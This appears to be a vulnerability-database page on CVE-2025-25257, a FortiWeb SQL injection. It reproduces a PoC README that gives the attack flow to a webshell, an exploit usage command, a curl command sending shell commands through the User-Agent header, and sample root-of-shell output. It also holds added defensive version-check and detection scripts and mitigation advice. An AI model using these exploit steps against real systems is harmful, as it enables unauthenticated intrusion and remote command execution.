Related vulnerability
Title: Fortinet FortiWeb SQL Injection Vulnerability (CVE-2025-25257)
Description: Fortinet FortiWeb is a web application firewall from Fortinet (US). It is designed to block attacks such as cross-site scripting, SQL injection, cookie poisoning and schema poisoning, protecting web applications and the sensitive database content behind them. FortiWeb 7.6.0 through 7.6.3, 7.4.0 through 7.4.7, 7.2.0 through 7.2.10 and 7.0.0 through 7.0.10 contain a SQL injection vulnerability caused by improper neutralization of special elements used in a SQL command (CWE-89), which allows SQL injection attacks.
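The affected ranges above are easy to misread when comparing version strings by hand (as text, "7.2.10" sorts before "7.2.9"). The following Python check is an added example written for this page; it is not part of the PoC repository or any Fortinet tooling. The table of inclusive upper bounds is taken directly from the description above, and the banner-style input format ("FortiWeb-VM 7.4.7,build1223") is an assumption for illustration.

```python
import re
from typing import Optional, Tuple

# Inclusive upper bound of the affected range for each FortiWeb branch,
# taken from the description above. Branches not listed there are treated
# as not affected by this code; consult the vendor advisory for anything else.
AFFECTED_MAX = {
    (7, 6): (7, 6, 3),
    (7, 4): (7, 4, 7),
    (7, 2): (7, 2, 10),
    (7, 0): (7, 0, 10),
}

_VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)")


def parse_version(text: str) -> Optional[Tuple[int, int, int]]:
    """Pull the first x.y.z triple out of a version string.

    Accepts a bare "7.4.7" as well as banner-style text such as
    "FortiWeb-VM 7.4.7,build1223" (assumed format, for illustration only).
    Returns None when no triple is present.
    """
    m = _VERSION_RE.search(text)
    if not m:
        return None
    major, minor, patch = (int(g) for g in m.groups())
    return (major, minor, patch)


def is_affected(text: str) -> Optional[bool]:
    """True if the version lies inside an affected range, False if it is
    newer than the range or on a branch the description does not list,
    None if the string cannot be parsed.

    Comparing int tuples rather than strings matters here: as strings,
    "7.2.10" sorts before "7.2.9", which would misclassify the last
    vulnerable 7.2 build as fixed.
    """
    v = parse_version(text)
    if v is None:
        return None
    ceiling = AFFECTED_MAX.get(v[:2])
    if ceiling is None:
        return False
    return v <= ceiling


if __name__ == "__main__":
    # Constructed sample inputs, not output from a real device.
    for sample in ("7.6.3", "7.6.4", "FortiWeb-VM 7.2.10,build1234",
                   "7.2.9", "8.0.1", "no version here"):
        print(f"{sample!r}: affected={is_affected(sample)}")
```

Feed it the version string from your inventory or from the appliance's status banner; a `None` result means the string did not contain a recognisable x.y.z version and should be checked by hand rather than treated as safe.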
Description
PoC for CVE-2025-25257, a critical unauthenticated SQL injection in FortiWeb. Exploits SQLi via the Authorization header to write a webshell and gain RCE. No login required. Fully automated.
Introduction
<p align="center">
<img src="sample.png" width="400" />
</p>
<h1 align="center">🚨 CVE-2025-25257 – FortiWeb SQLi to RCE</h1>
<p align="center"><b>Critical SQL Injection → Webshell Execution</b></p>
<p align="center"><code>Discovered and weaponized by 0xgh057r3c0n</code></p>
---
## 🧠 Vulnerability Overview
`CVE-2025-25257` is a SQL injection (CWE-89) in the FortiWeb API endpoint `/api/fabric/device/status`: the value of the `Authorization: Bearer` header is placed into a SQL query without neutralising special characters, so the single quote and semicolon in an attacker-supplied token terminate the intended statement and let the attacker append their own.
> Because the endpoint is reachable without credentials, an attacker can inject SQL unauthenticated, write a file to disk with `INTO OUTFILE`, and turn that file into a webshell for remote command execution.
---
## 💥 Attack Flow
```text
SQL Injection ➜ SQL INTO OUTFILE ➜ Python chmod Gadget ➜ Trigger ➜ Webshell RCE
```
---
## 📍 Vulnerable Endpoint
```http
GET /api/fabric/device/status HTTP/1.1
Authorization: Bearer ';<SQLi>
```
---
## 🔓 Exploit Features
* SQLi via Bearer token
* SQL `INTO OUTFILE` to drop shell
* Python hook triggers chmod
* Commands executed via User-Agent
* Fully automated PoC
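The request shape in the Vulnerable Endpoint section and the feature list above give a defender enough to write a detection: a request to `/api/fabric/device/status` whose Bearer token contains characters no real token would carry. The following check is an added example written for this page, not code from the 0xgh057r3c0n repository. It assumes requests have already been parsed into a flat dict of `path` plus headers (how you get there depends on your proxy or WAF logs), and the sample traffic is constructed, not captured.

```python
import re
from typing import Dict, List

# The only endpoint the write-up names. A rule scoped this tightly will not
# see injection attempts against other API paths; widen it if your logs show
# the same header handling elsewhere.
TARGET_PATH = "/api/fabric/device/status"

# Primary signal, an allow-list: opaque tokens and JWTs use the base64 /
# base64url alphabets plus '.' separators and '=' padding. A quote, semicolon,
# space or angle bracket in a bearer token is never legitimate.
TOKEN_CHARSET = re.compile(r"^[A-Za-z0-9._=+/-]+$")

# Secondary, more specific signal: SQL syntax of the kind the attack flow
# above relies on (the leading quote/semicolon and the INTO OUTFILE write).
# '--' is deliberately absent because consecutive dashes are legal base64url.
SQL_MARKERS = re.compile(
    r"['\";]|/\*|\b(?:union|select|into\s+outfile|load_file|sleep)\b",
    re.IGNORECASE,
)


def inspect_request(req: Dict[str, str]) -> List[str]:
    """Return detection findings for one request (empty list means benign).

    `req` is a flat dict holding 'path' and the request headers; keys are
    matched case-insensitively. Only the Bearer form is inspected because
    that is the only form the write-up describes.
    """
    fields = {k.lower(): v for k, v in req.items()}
    path = fields.get("path", "").split("?", 1)[0]
    if path != TARGET_PATH:
        return []
    auth = fields.get("authorization", "")
    if not auth.lower().startswith("bearer "):
        return []
    token = auth[len("bearer "):].strip()
    findings: List[str] = []
    if token and not TOKEN_CHARSET.fullmatch(token):
        findings.append("bearer token contains characters outside the token alphabet")
    m = SQL_MARKERS.search(token)
    if m:
        findings.append(f"bearer token contains SQL syntax: {m.group(0)!r}")
    return findings


def scan(requests: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run inspect_request over a batch and keep only the hits."""
    hits: List[Dict[str, object]] = []
    for i, req in enumerate(requests):
        findings = inspect_request(req)
        if findings:
            hits.append({"index": i, "path": req.get("path"), "findings": findings})
    return hits


# Constructed sample traffic (not captured from a real device). The second
# entry uses the page's own placeholder for the injected token.
SAMPLE_REQUESTS = [
    {"path": TARGET_PATH,
     "Authorization": "Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJmYWJyaWMifQ.c2lnbmF0dXJl"},
    {"path": TARGET_PATH, "Authorization": "Bearer ';<SQLi>"},
    {"path": "/api/v2/system/status", "Authorization": "Bearer ';<SQLi>"},
    {"path": TARGET_PATH, "Authorization": "Basic dXNlcjpwYXNz"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_REQUESTS):
        print(hit)
```

The allow-list is the signal to alert on; the keyword match only adds context to the finding. Pair it with a second rule on unexpected requests to `/cgi-bin/` carrying non-browser `User-Agent` values, since that is the command channel the feature list describes for the dropped shell.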
---
## 🧪 Usage
```bash
python3 CVE-2025-25257.py -t https://target-host.com
```
Then:
```bash
curl -k -H "User-Agent: whoami" https://target-host.com/cgi-bin/x.cgi
```
---
## 🔧 Requirements
* Python 3.6+
* `requests` module
Install:
```bash
pip install requests
```
---
## 📤 Sample Output
```text
[*] Writing Webshell Chunk: #!/bin/sh ...
[>] Exporting Webshell to File...
[*] Writing Chmod Gadget Chunk: import os ...
[>] Triggering chmod via Python Hook...
[*] Executing `id` via Webshell...
uid=33(www-data) gid=33(www-data)
[+] Webshell Ready:
> https://target-host.com/cgi-bin/x.cgi
> Send commands via User-Agent header
```
---
## 📊 CVSS Estimate
| Metric | Value |
| ------------------- | -------------- |
| Base Score | 9.8 (CRITICAL) |
| Attack Vector | Network |
| Privileges Required | None |
| User Interaction | None |
| Impact | High (C/I/A) |
---
## 🛡️ Mitigation
* Upgrade to a FortiWeb release past the affected ranges given in the description: 7.6.4, 7.4.8, 7.2.11 or 7.0.11 and later, as listed in the vendor advisory for this CVE.
* Until the upgrade is done, disable the HTTP/HTTPS administrative interface or restrict it to trusted management networks; the vulnerable endpoint needs no credentials, so network exposure is the whole risk.
* On the code side, the fix is to treat the `Authorization` header as untrusted input and bind it as a query parameter instead of concatenating it into SQL.
* Limit where the database account may write (`INTO OUTFILE` needs filesystem write access) and do not execute CGI from writable directories; an unexpected new file under `/cgi-bin/` on a FortiWeb is worth investigating.
---
## 👨💻 Author
**0xgh057r3c0n**
🔗 [github.com/0xgh057r3c0n](https://github.com/0xgh057r3c0n)
---
## ⚠️ Disclaimer
This proof-of-concept is for **educational and authorized testing** only.
Use at your own risk. The author is not responsible for misuse.
---
File snapshot
[4.0K] /data/pocs/2b821728f5a49cb396016fb0ae017e2302d39746
├── [5.7K] CVE-2025-25257.py
├── [1.1K] LICENSE
├── [2.4K] README.md
└── [119K] sample.png
0 directories, 4 files
Notes
1. Prefer accessing the PoC through the original source.
2. If the source has been removed or is unreachable, email f.jinxu#gmail.com (replace # with @) to request the local snapshot.
3. 神龙 has taken a snapshot of the PoC code for you; to support its long-term maintenance, please consider paying for the local PoC. Thank you for your support.